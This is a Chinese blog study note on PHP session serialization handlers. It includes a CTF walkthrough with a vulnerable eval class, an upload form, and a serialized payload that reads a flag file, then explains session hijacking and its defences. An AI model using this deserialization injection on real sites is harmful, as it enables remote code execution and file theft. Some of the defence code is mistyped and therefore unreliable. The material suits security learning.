PHP SESSION相关学习--Day16

最新推荐文章于 2023-07-13 09:45:00 发布
最新推荐文章于 2023-07-13 09:45:00 发布
阅读量319 收藏 1
点赞数 1
分类专栏: 日常学习小记 php session N1CTF2020
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/veinard_F/article/details/109224920
版权

php session存储机制

php session的存储机制是由session.serialize_handler来定义引擎的,默认以文件的方式存储,且存储的文件是由sess_sessionid来决定文件名的,文件名时可变的,如Codeigniter框架的session存储的文件名为ci_sessionSESSIONID,也就是ci_session加上sessionid字符串,文件的内容时session值序列化之后的结果。
session.serialize_handler定义的三种引擎

  1. php处理器
    存储格式:键名 竖线 serialize()函数序列化之后的值
  2. php_binaryj处理器
    键名长度对应的ascll字符 键名 serialize()函数序列化之后的值
  3. php_serialize处理器
    serialize()函数序列化处理的数组
    一道例题
    源码:
<?php
//A webshell is wait for you
ini_set('session.serialize_handler', 'php');
session_start();
class OowoO
{
    public $mdzz;
    function __construct()
    {
        $this->mdzz = 'phpinfo();';
    }
    
    function __destruct()
    {
        eval($this->mdzz);
    }
}
if(isset($_GET['phpinfo']))
{
    $m = new OowoO();
}
else
{
    highlight_string(file_get_contents('index.php'));
}
?>

?phpinfo查看信息,看到session.serialize_handler设置的是php_serialize机制,用这个方式序列化存储session
在这里插入图片描述
这里涉及到php有个上传文件时能将文件名写入session的技巧:
满足下面两个条件就可以将文件写入session
1、session.upload_progress.enabled = On(通过phpinfo信息知道此时是On);
2、上传一个字段的属性名和session.upload_progress.name的值相等,根据phpinfo中的信息
在这里插入图片描述
其值为PHP_SESSION_UPLOAD_PROGRESS,即上传
name=“PHP_SESSION_UPLOAD_PROGRESS”

构造一个文件上传页面:
(这里由于我的phpstorm中配置的问题,导致浏览器不能访问该文件的地址,出现 requested without authorization, you can copy URL and open it in browser to trust it ,解决这个问题需要在file settings下

在这里插入图片描述
打开Debugger,进行如下设置
在这里插入图片描述
。。。)
之后通过下面的代码成功构造上传界面

<!DOCTYPE html>
<html>
<body>
<form action="http://web.jarvisoj.com:32784/index.php" method="POST" enctype="multipart/form-data">
    <input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" value="33" />//这里value的值不能为空
    <input type="file" name="file" />
    <input type="submit" value="submit" />
</form>
</body>
</html>

随便上传一个文件后抓包,
在这里插入图片描述
禁用了一些函数,system(‘ls’)不行,可以用print_r(scandir(dirname(__FILE__)));
在这里插入图片描述
构造payload的代码:

<?php
class OowoO
{
    public $mdzz="使用:print_r(scandir(dirname(__FILE__)));";
}
$obj = new OowoO();
echo serialize($obj);
?>

在这里插入图片描述

将filename改成序列化后的结果,记得加|(竖线),以及转义符
在这里插入图片描述
在这里插入图片描述

在phpinfo中查看路径
在这里插入图片描述
修改payload
|O:5:\"OowoO\":1:{s:4:\"mdzz\";s:88:\"print_r(file_get_contents(\"/opt/lampp/htdocs/Here_1s_7he_fl4g_buT_You_Cannot_see.php\"));\";}

拿到flag
在这里插入图片描述

php session 漏洞–会话劫持

  1. 一种劫持tcp协议的方法,几乎所有局域网都有被劫持的可能

  2. session会话:当客户端的浏览器连接到服务器后,服务器就会建立一个该用户的session(由一个独立的字符串来识别,成为session id),每个用户的session是独立的,并且由服务器来维护。当用户发送请求时,所发送的http表头内包含session id的值,服务器会通过这个值来识别发送请求的用户。

  3. session内容:
    session会保存用户的个人数据,可以保存通过验证的用户账号和密码。如果需要验证用户身份,就可以拿已经保存了的账号和密码进行比较。

  4. session生命周期:
    从用户连上服务器后开始,关掉浏览器或是注销时用户session_destroy函数删除session数据时结束。如果用户在20分钟内没有使用计算机的动作,session也会自动结束。

  5. 架构:List item

  6. 会话劫持:指攻击者利用各种手段来获取用户的session id,如果成功,攻击者就可以利用目标用户的身份来登陆网站,获取目标用户的操作权限。
    攻击方式:
    (1)暴力破解:通过尝试各种session id
    (2)计算:前提是该session id不是随机产生
    (3)窃取:使用网络截获,xss攻击等方法
    攻击步骤:
    在这里插入图片描述
    session_start():打开session
    echo session_id();获取访客的session id
    防御方法:
    (1)定期更改session id
    函数bool session_regenerate_id([bool delete_old_session])delete_old_session 为true时,则删除旧的session文件;为false时,则保留旧的session,默认为flase。
    在index.php开头加上
    session_start();
    session_regenerate_id(TRUE); 后每次重新加载都会产生新的session id。
    (2)更改session的名称
    session的默认名称是PHPSESSID,此变量会保存在cookie中,如果黑客不抓包分析,就不能猜到这个名称,阻挡部分攻击session_start();
    session_name(“mysessionid”);
    (3)关闭透明化session id
    透明化session id指当浏览器中的http请求没有使用cookies来制定session id时,session id使用链接来传递;打开php.ini,编辑session.use_trans_sid = 0
    代码中
    int_set(“session.use_trans_sid”, 0);
    session_start();
    (4)只从cookie检查session id
    session.use_cookies = 1 表示使用cookies存放session id
    session.use_only_cookies = 1 表示只使用cookies存放session id,这可以避免session固定攻击
    代码中
    int_set(“session.use_cookies”, 1);
    int_set(“session.use_only_cookies”, 1); p>

5)使用URL传递隐藏参数
session_start();
$ seid = md5(uniqid(rand()), TRUE));
$ _SESSION[“seid”] = $ seid;
攻击者虽然能获取session数据,但是无法得知$seid的值,只要检查seid的值,就可以确认当前页面是否是web程序自己调用的

piubiutiu~
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
CVE-2016-7124漏洞复现
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
02-22 2059
CVE-2016-7124漏洞复现 实验环境 操作机:Windows 10 服务器:apache 2.4.39 PHP版本:5.2.17nts 漏洞影响版本 PHP5 < 5.6.25 PHP7 < 7.0.10 漏洞产生原因 如果类中存在__wakeup方法,调用 unserilize() 方法前则先调用__wakeup方法,当序列化字符串中表示对象属性个数的值大于 真实的属性个数时会跳过__wakeup的执行 漏洞复现 编写测试脚本 <?php header("Content-Type
php serialize用处,浅谈php函数serialize()与unserialize()的使用方法
weixin_33649132的博客
04-01 599
php中serialize()与unserialize()函数是一对函数,下面本文章就来为各位同学介绍serialize()与unserialize()函数的使用例子,希望能帮助到各位。php函数serialize():这个函数作用就是序列化数据,返回一个可存储的字符串,该函数有利于存储或传递PHP的值,同时不丢失其类型和结构。所以我们在cms数据库里面经常看到这样的结构。一般,我们将复杂或者数...
PHP的序列化和反序列化入门
最新发布
2301_77342543的博客
07-13 1951
serialize() //将一个对象转换成一个字符串unserialize() //将字符串还原成一个对象通过序列化与反序列化我们可以很方便的在PHP中进行对象的传递。本质上反序列化是没有危害的。但是如果用户对数据可控那就可以利用反序列化构造payload攻击php//实例化一个对象?返回结果s:4:"name";s:3:"age";s:2:"18";O代表对象,这里是序列化的一个对象,要序列化数组的就用A6表示的是类的长度sunset表示对是类名。
php 数组序列化和反序列化serialize 和 unserialize
lvfk
10-15 1062
<?php $a = array('a' => 'Apple' ,'b' => 'banana' , 'c' => 'Coconut'); //序列化数组 $s = serialize($a); echo $s; //输出结果:a:3:{s:1:"a";s:5:"Apple";s:1:"b";s:6:"banana";s:1:"c";s:7:"Coconut";} echo
计算机后端-PHP视频教程. laravel-p2p-day1ta-12.pdf
05-22
总结起来,学习和使用Laravel框架需要理解其基本的目录结构、安装流程、权限设置以及虚拟主机配置。了解这些知识后,你就可以开始构建自己的PHP Web应用了。Laravel提供的强大功能和优雅的语法将使开发过程更加愉快...
PHP4中session登录页面的应用
10-30
PHP4中,Session是一种非常重要的机制,用于在用户的整个会话期间跟踪和存储数据。在给定的脚本中,我们看到一个简单的登录系统,它利用了PHPSession功能来验证用户身份并控制访问权限。以下是这个脚本中涉及的...
核心编程-day041
08-08
【核心编程-day041】主要探讨的是网络编程中的会话技术,这涉及到服务器与客户端之间的交互,尤其是在HTTP协议无状态特性的背景下如何保持用户的会话连续性。会话技术主要包括Cookie技术和Session技术。 会话技术是...
day21笔记1
08-08
PHP Session 知识详解】 在PHP中,Session是一种用于保存用户状态的机制,它允许在用户的不同页面请求之间共享数据。在今天的笔记中,我们将深入探讨Session的多个方面,包括其工作原理、配置选项以及如何自定义...
php经典面试题-小公司通杀
04-04
12. **日期时间操作**:`date()`函数结合`strtotime()`可以获取前一天的日期时间,例如`echo date("Y-m-d H:i:s", strtotime("-1 day"));` 13. **输出函数区别**: - `echo`:用于输出一个或多个字符串,速度快。 ...
PHP的serialize序列化数据以及JSON格式化数据分析
10-23
的内容是PHP的serialize序列化数据以及JSON格式化数据分析,需要的朋友可以参考下
浅谈php serialize()与unserialize()的用法
12-18
serialize()和unserialize()在php手册上的解释是:serialize — Generates a storable representation of a valueserialize — 产生一个可存储的值的表示unserialize — Creates a PHP value from a stored representationunserialize — 从已存储的表示中创建 PHP 的值很显然,”a stored representation”的解释翻译成了一个可存储的值后依然很让人非常费解它的意思。如果语言已经无法表述清楚,那么我们可以以一个具体的PHP的例
php serialize参数,PHP 序列化(serialize)格式详解
weixin_35691715的博客
03-10 3192
PHP 序列化(serialize)格式详解1.前言PHP (从 PHP 3.05 开始)为保存对象提供了一组序列化和反序列化的函数:serialize、unserialize。不过在PHP 手册中对这两个函数的说明仅限于如何使用,而对序列化结果的格式却没做任何说明。因此,这对在其他语言中实现 PHP方式的序列化来说,就比较麻烦了。虽然以前也搜集了一些其他语言实现的 PHP 序列化的程序,不过这些...
php serialize参数,PHP序列化 serialize 格式详解
weixin_39693971的博客
03-10 427
6.自定义对象序列化6.1.PHP 4 中自定义对象序列化PHP 4 中提供了 __sleep 和 __wakeup 这两个方法来自定义对象的序列化。不过这两个函数并不改变对象序列化的格式,影响的仅仅是被序列化字段的个数。关于它们的介绍,在 PHP 手册中写的还算比较详细。这里就不再多做介绍了。6.2.PHP 5 中自定义对象序列化PHP 5 中增加了接口(interface)功能。PHP 5 本...
php serialize(),PHP中serialize的详细介绍
weixin_39621456的博客
03-31 352
serializeserialize() 返回字符串,此字符串包含了表示value 的字节流,可以存储于任何地方。这有利于存储或传递 PHP 的值,同时不丢失其类型和结构。想要将已序列化的字符串变回 PHP 的值,可使用unserialize() 。serialize()可处理除了resource之外的任何类型。甚至可以serialize()那些包含了指向其自身引用的数组。你正serialize...
PHP变量处理之serialize
m0_37477061的博客
02-28 186
https://www.cnblogs.com/yamtsin/p/5922872.html
php serialize参数,php serialize(),unserialize()
weixin_35725559的博客
03-10 144
序列化serialize()与反序列化unserialize():序列化serialize():就是将一个变量所代表的 “内存数据”转换为“字符串”的形式,并持久保存在硬盘(写入文件中保存)上的一种做法,即,把“内存数据”转换为“字符串”然后保存到文件中;反序列化unserialize():就是将序列化之后保存在硬盘(文件)上的“字符串数据”恢复为其原来的内存形式的变量数据的一种做法,即,把文件中...
PHP 序列化(serialize)格式详解
weixin_34204057的博客
08-17 471
1.前言 PHP (从 PHP 3.05 开始)为保存对象提供了一组序列化和反序列化的函数:serialize、unserialize。不过在 PHP 手册中对这两个函数的说明仅限于如何使用,而对序列化结果的格式却没做任何说明。因此,这对在其他语言中实现 PHP 方式的序列化来说,就比较麻烦了。虽然以前也搜集了一些其他语言实现的 PHP 序列化的程序,不过这些实现都不完...
php serialize序列化对象或者数组
dylwx_2005的专栏
06-16 566
https://www.cnblogs.com/bk7788/p/6664551.html
spring-session-data-redis整合
03-31
Spring Session是一个用于管理用户会话状态的框架,它提供了一种统一的方式来管理不同类型的会话,如HTTP会话、WebSocket会话等。而spring-session-data-redis是Spring Session的一个扩展,它使用Redis作为会话存储。 整合步骤: 1. 添加Maven依赖 ``` <dependency> <groupId>org.springframework.session</groupId> <artifactId>spring-session-data-redis</artifactId> <version>2.4.0</version> </dependency> <dependency> <groupId>org.springframework.data</groupId> <artifactId>spring-data-redis</artifactId> <version>2.4.10.RELEASE</version> </dependency> ``` 2. 配置Redis连接 ``` spring.redis.host=localhost spring.redis.port=6379 spring.redis.password= spring.redis.database=0 ``` 3. 配置RedisSession配置类 ``` @Configuration @EnableRedisHttpSession public class RedisSessionConfig { } ``` 4. 使用Redis存储会话 ``` @GetMapping("/test") public String test(HttpSession session) { session.setAttribute("name", "张三"); return "success"; } @GetMapping("/get") public String get(HttpSession session) { Object name = session.getAttribute("name"); return name.toString(); } ``` 以上就是spring-session-data-redis整合的步骤,通过使用Redis存储会话,可以实现分布式环境下的会话管理。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值